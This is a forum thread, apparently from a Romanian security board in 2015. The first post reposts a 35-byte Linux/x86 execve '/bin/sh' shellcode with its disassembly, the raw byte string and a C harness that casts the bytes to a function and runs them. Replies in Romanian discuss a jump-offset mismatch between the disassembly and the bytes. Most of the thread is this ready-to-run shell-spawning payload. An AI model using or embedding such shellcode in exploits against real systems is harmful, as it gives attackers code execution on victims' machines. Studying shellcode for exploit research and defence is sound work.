Aerosol Posted May 4, 2015 Report Posted May 4, 2015 /*; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes; Platform: linux/x86_64; Date: 2014-06-26; Author: Mohammad Reza Espargham; Simple ShellCodesection .text:08048060 <_start>: 8048060: eb 17 jmp 804807908048062 : 8048062: 5e pop %esi 8048063: 31 d2 xor %edx,%edx 8048065: 52 push %edx 8048066: 56 push %esi 8048067: 89 e1 mov %esp,%ecx 8048069: 89 f3 mov %esi,%ebx 804806b: 31 c0 xor %eax,%eax 804806d: b0 0b mov $0xb,%al 804806f: cd 80 int $0x80 8048071: 31 db xor %ebx,%ebx 8048073: 31 c0 xor %eax,%eax 8048075: 40 inc %eax 8048076: cd 80 int $0x8008048078 : 8048078: e8 e5 ff ff ff call 8048062 804807d: 2f das 804807e: 62 69 6e bound %ebp,0x6e(%ecx) 8048081: 2f das 8048082: 73 68 jae 80480ec*/#include <stdio.h>#include <string.h>#include <sys/mman.h>#define PAGE_SIZE 4096Uchar code[] = { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68"};intmain() {printf("Shellcode Length: %d\n", (int)strlen(code));int (*ret)() = (int(*)())code;ret();return 0;}Source Quote
Gushterul Posted May 4, 2015 Report Posted May 4, 2015 (nu ca ar fi cineva destept sa le si foloseasca...)jmp 8048079 ? Quote
Nytro Posted May 4, 2015 Report Posted May 4, 2015 E relativ.Opcode-ul "eb 17" == "sari 0x17 bytes"8048062 (adresa urmatoare) + 0x17 == 8048079E ciudat ca e "jmp 8048079" si nu "jmp 08048078" pentru ca la "08048078" se afla acel call care pune pe stack "/bin/sh".A, pula. Daca te uiti in shellcode-ul din programul C: \xeb\x16\x5e\x31Este "eb 16" adica "jmp 08048078". Quote
